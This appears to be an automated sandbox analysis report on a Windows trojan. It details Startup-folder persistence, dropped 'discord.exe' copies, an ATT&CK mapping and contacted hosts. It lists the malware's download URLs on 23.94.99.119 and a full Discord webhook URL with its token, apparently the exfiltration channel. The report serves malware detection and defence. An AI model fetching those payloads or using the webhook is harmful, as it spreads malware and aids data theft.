Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management Instrumentation121
Registry Run Keys / Startup Folder		11
Process Injection		11
Masquerading		1
Input Capture		11
Security Software Discovery		Remote Services1
Input Capture		Exfiltration Over Other Network Medium11
Encrypted Channel		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/Job1
Services File Permissions Weakness		121
Registry Run Keys / Startup Folder		2
Virtualization/Sandbox Evasion		LSASS Memory2
Virtualization/Sandbox Evasion		Remote Desktop Protocol1
Archive Collected Data		Exfiltration Over Bluetooth1
Non-Standard Port		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)1
Services File Permissions Weakness		1
Disable or Modify Tools		Security Account Manager1
Application Window Discovery		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration12
Ingress Tool Transfer		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
Process Injection		NTDS1
Remote System Discovery		Distributed Component Object ModelInput CaptureScheduled Transfer4
Non-Application Layer Protocol		SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information		LSA Secrets2
File and Directory Discovery		SSHKeyloggingData Transfer Size Limits15
Application Layer Protocol		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common1
Services File Permissions Weakness		Cached Domain Credentials12
System Information Discovery		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup Items1
Timestomp		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 798176 Sample: uBZeAVcb6r.exe Startdate: 03/02/2023 Architecture: WINDOWS Score: 92 44 Snort IDS alert for network traffic 2->44 46 Antivirus detection for URL or domain 2->46 48 Antivirus detection for dropped file 2->48 50 3 other signatures 2->50 8 uBZeAVcb6r.exe 18 5 2->8         started        13 discord.exe 15 4 2->13         started        15 discord.exe 2->15         started        17 discord.exe 2->17         started        process3 dnsIp4 38 23.94.99.119, 1337, 49684, 49686 AS-COLOCROSSINGUS United States 8->38 40 canary.discord.com 162.159.137.232, 443, 49685, 49688 CLOUDFLARENETUS United States 8->40 32 C:\Users\user\AppData\Roaming\...\discord.exe, PE32 8->32 dropped 52 Drops PE files to the startup folder 8->52 19 javaw.exe 4 8->19         started        34 C:\Users\user\AppData\Roaming\...\discord.exe, PE32 13->34 dropped 54 Drops executable to a common third party application directory 13->54 22 javaw.exe 2 13->22         started        42 162.159.138.232, 443, 49690 CLOUDFLARENETUS United States 15->42 24 javaw.exe 15->24         started        26 javaw.exe 17->26         started        file5 signatures6 process7 dnsIp8 36 192.168.2.1 unknown unknown 19->36 28 icacls.exe 1 19->28         started        process9 process10 30 conhost.exe 28->30         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
uBZeAVcb6r.exe5%ReversingLabs
uBZeAVcb6r.exe13%VirustotalBrowse

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exe100%AviraHEUR/AGEN.1217604
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exe100%AviraHEUR/AGEN.1217604
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exe100%Joe Sandbox ML
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exe100%Joe Sandbox ML
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exe29%ReversingLabsWin32.Trojan.Generic
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exe29%ReversingLabsWin32.Trojan.Generic

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://www.fontbureau.comalsa0%URL Reputationsafe
http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
http://www.jiyu-kobo.co.jp/a-d0%URL Reputationsafe
http://www.fontbureau.comd90%URL Reputationsafe
http://www.chambersign.org10%URL Reputationsafe
https://ocsp.quovadisoffshore.com0%URL Reputationsafe
http://www.fontbureau.comalsF0%URL Reputationsafe
http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
http://www.sajatypeworks.com0%URL Reputationsafe
http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/30%URL Reputationsafe
http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
http://www.jiyu-kobo.co.jp//0%URL Reputationsafe
http://www.fontbureau.com30%URL Reputationsafe
http://www.jiyu-kobo.co.jp/-0%URL Reputationsafe
http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/Y00%URL Reputationsafe
http://www.ascendercorp.com/typedesigners.html0%URL Reputationsafe
http://www.urwpp.deDPlease0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/$0%URL Reputationsafe
http://www.zhongyicts.com.cn0%URL Reputationsafe
http://policy.camerfirma.com00%URL Reputationsafe
http://www.certplus.com/CRL/class2.crl0%URL Reputationsafe
http://bugreport.sun.com/bugreport/0%URL Reputationsafe
http://www.fontbureau.comicTF0%URL Reputationsafe
http://cps.chambersign.org/cps/chambersroot.html0%URL Reputationsafe
http://www.carterandcone.coml0%URL Reputationsafe
http://www.certplus.com/CRL/class3P.crl0%URL Reputationsafe
http://crl.securetrust.com/STCA.crl0%URL Reputationsafe
https://canary.discord.com/api/webhooks/1061591881189961839/KwqGODsud5jnEMwoLx_f6PdyZpFgjhKU-fUjwmwXiSSOBri5CuGLlgGvA4a7d18uh4zS0%Avira URL Cloudsafe
http://crl.xrampsecurity.com/XGCA.crl00%URL Reputationsafe
http://www.quovadis.bm00%URL Reputationsafe
http://www.jiyu-kobo.co.jp/_0%URL Reputationsafe
http://www.founder.com.cn/cn$0%URL Reputationsafe
http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl00%URL Reputationsafe
http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
http://www.founder.com.cn/cnX0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/jp/I0%URL Reputationsafe
http://cps.chambersign.org/cps/chambersroot.html00%URL Reputationsafe
http://www.tiro.com0%URL Reputationsafe
http://www.founder.com.cn/cn=0%URL Reputationsafe
http://www.goodfont.co.kr0%URL Reputationsafe
http://crl.securetrust.com/STCA.crl00%URL Reputationsafe
http://23.94.99.11940%Avira URL Cloudsafe
http://23.94.99.119/discord.exe100%Avira URL Cloudmalware
http://www.typography.netD0%URL Reputationsafe
http://23.94.99.119/discord.exeu/Microsoft/Windows/Start0%Avira URL Cloudsafe
http://23.94.99.119/discord.jar100%Avira URL Cloudmalware
http://www.jiyu-kobo.co.jp/Y0esr0%Avira URL Cloudsafe
https://canary.discord.com/api/webhooks/1061591881189961839/KwqGODsud5jnEMwoLx_f6PdyZpFgjhKU-fUjwmwX0%Avira URL Cloudsafe
http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
http://fontfabrik.com0%URL Reputationsafe
http://www.founder.com.cn/cny0%URL Reputationsafe
http://www.fontbureau.comcom0%URL Reputationsafe
http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0%URL Reputationsafe
http://www.sandoll.co.kr0%URL Reputationsafe
https://ocsp.quovadisoffshore.com00%URL Reputationsafe
http://www.sakkal.com0%URL Reputationsafe
http://www.chambersign.org0%URL Reputationsafe
http://www.founder.com.cn/cnd0%URL Reputationsafe
http://crl.xrampsecurity.com/XGCA.crl0%URL Reputationsafe
http://www.fontbureau.comion0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/jp/r0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
http://www.fontbureau.comd0%URL Reputationsafe
http://canary.discord.com0%Avira URL Cloudsafe
http://www.founder.com.cn/cn0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/Y0$0%Avira URL Cloudsafe
http://www.jiyu-kobo.co.jp/d.0%Avira URL Cloudsafe
http://www.jiyu-kobo.co.jp/typo0%Avira URL Cloudsafe
http://www.ascendercorp.com/typedesigners.html80%Avira URL Cloudsafe
http://www.jiyu-kobo.co.jp/eams0%Avira URL Cloudsafe
http://www.fontbureau.comr0%URL Reputationsafe
http://www.fontbureau.comm0%URL Reputationsafe
http://23.94.99.1190%Avira URL Cloudsafe
https://canary.discord.com0%Avira URL Cloudsafe
http://cps.chambersign.org/cps/chambersroot.htmlK0%Avira URL Cloudsafe
http://23.94.99.119D80%Avira URL Cloudsafe
https://canary.discord.com40%Avira URL Cloudsafe
http://www.fontbureau.comldik0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
canary.discord.com
162.159.137.232
truefalse
    		unknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://canary.discord.com/api/webhooks/1061591881189961839/KwqGODsud5jnEMwoLx_f6PdyZpFgjhKU-fUjwmwXiSSOBri5CuGLlgGvA4a7d18uh4zSfalse
    • Avira URL Cloud: safe
    		unknown
    http://23.94.99.119/discord.exetrue
    • Avira URL Cloud: malware
    		unknown
    http://23.94.99.119/discord.jartrue
    • Avira URL Cloud: malware
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://www.fontbureau.comalsauBZeAVcb6r.exe, 00000000.00000003.277551803.0000000006E14000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.277511363.0000000006E11000.00000004.00000020.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    http://crl.chambersign.org/chambersroot.crl0javaw.exe, 00000001.00000002.525531594.000000000507C000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.525531594.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.530479660.000000000A82A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.525531594.00000000054F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AF5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009E23000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AC9000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    http://www.jiyu-kobo.co.jp/typouBZeAVcb6r.exe, 00000000.00000003.275357856.0000000006E15000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://www.jiyu-kobo.co.jp/a-duBZeAVcb6r.exe, 00000000.00000003.276096481.0000000006E15000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.275752177.0000000006E15000.00000004.00000020.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    http://www.fontbureau.comd9uBZeAVcb6r.exe, 00000000.00000003.277551803.0000000006E14000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.277511363.0000000006E11000.00000004.00000020.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    http://www.jiyu-kobo.co.jp/eamsuBZeAVcb6r.exe, 00000000.00000003.275357856.0000000006E15000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://www.chambersign.org1javaw.exe, 00000001.00000002.525531594.000000000507C000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.525531594.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.530479660.000000000A82A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.525531594.00000000054F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AF5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009E23000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AC9000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    http://repository.swisssign.com/0javaw.exe, 00000001.00000002.525531594.000000000507C000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.525531594.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.530479660.000000000A82A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.525531594.00000000054F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AF5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009E23000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AC9000.00000004.00000800.00020000.00000000.sdmpfalse
      		high
      http://www.fontbureau.com/designersuBZeAVcb6r.exe, 00000000.00000002.532067399.00000000080A2000.00000004.00000800.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000002.531639444.0000000006E00000.00000004.00000020.00020000.00000000.sdmpfalse
        		high
        https://ocsp.quovadisoffshore.comjavaw.exe, 00000001.00000002.530479660.000000000A743000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009D3F000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        http://www.fontbureau.comalsFuBZeAVcb6r.exe, 00000000.00000003.277551803.0000000006E14000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        http://www.certplus.com/CRL/class3P.crl0javaw.exe, 00000001.00000002.525531594.000000000507C000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.525531594.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.530479660.000000000A82A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.525531594.00000000054F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AF5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009E23000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AC9000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        http://www.sajatypeworks.comuBZeAVcb6r.exe, 00000000.00000002.532067399.00000000080A2000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        http://www.ascendercorp.com/typedesigners.html8uBZeAVcb6r.exe, 00000000.00000003.276726649.0000000006E1F000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.276834152.0000000006E1F000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://www.founder.com.cn/cn/cTheuBZeAVcb6r.exe, 00000000.00000002.532067399.00000000080A2000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        http://www.jiyu-kobo.co.jp/3uBZeAVcb6r.exe, 00000000.00000003.276096481.0000000006E15000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.275752177.0000000006E15000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        http://www.certplus.com/CRL/class2.crl0javaw.exe, 00000001.00000002.525531594.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.530479660.000000000A82A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.525531594.00000000054F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000003.313426968.0000000015707000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AF5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009E23000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000003.314077068.0000000015707000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.538711451.0000000015707000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AC9000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        http://www.jiyu-kobo.co.jp//uBZeAVcb6r.exe, 00000000.00000003.276620446.0000000006E11000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.276572251.0000000006E11000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.276096481.0000000006E15000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        http://www.fontbureau.com3uBZeAVcb6r.exe, 00000000.00000003.277224524.0000000006E14000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        http://www.jiyu-kobo.co.jp/-uBZeAVcb6r.exe, 00000000.00000003.276620446.0000000006E11000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.276572251.0000000006E11000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.276096481.0000000006E15000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.275752177.0000000006E15000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        http://23.94.99.1194uBZeAVcb6r.exe, 00000000.00000002.527196154.000000000319D000.00000004.00000800.00020000.00000000.sdmp, discord.exe, 00000009.00000002.526982695.000000000308E000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		low
        http://www.galapagosdesign.com/DPleaseuBZeAVcb6r.exe, 00000000.00000002.532067399.00000000080A2000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        http://www.jiyu-kobo.co.jp/Y0uBZeAVcb6r.exe, 00000000.00000003.276620446.0000000006E11000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.276572251.0000000006E11000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.276096481.0000000006E15000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.275752177.0000000006E15000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        http://www.ascendercorp.com/typedesigners.htmluBZeAVcb6r.exe, 00000000.00000003.276572251.0000000006E11000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        http://www.urwpp.deDPleaseuBZeAVcb6r.exe, 00000000.00000002.532067399.00000000080A2000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        http://repository.swisssign.com/Sjavaw.exe, 00000001.00000002.525531594.00000000054F5000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          http://www.jiyu-kobo.co.jp/$uBZeAVcb6r.exe, 00000000.00000003.274372956.0000000006E06000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.zhongyicts.com.cnuBZeAVcb6r.exe, 00000000.00000002.532067399.00000000080A2000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
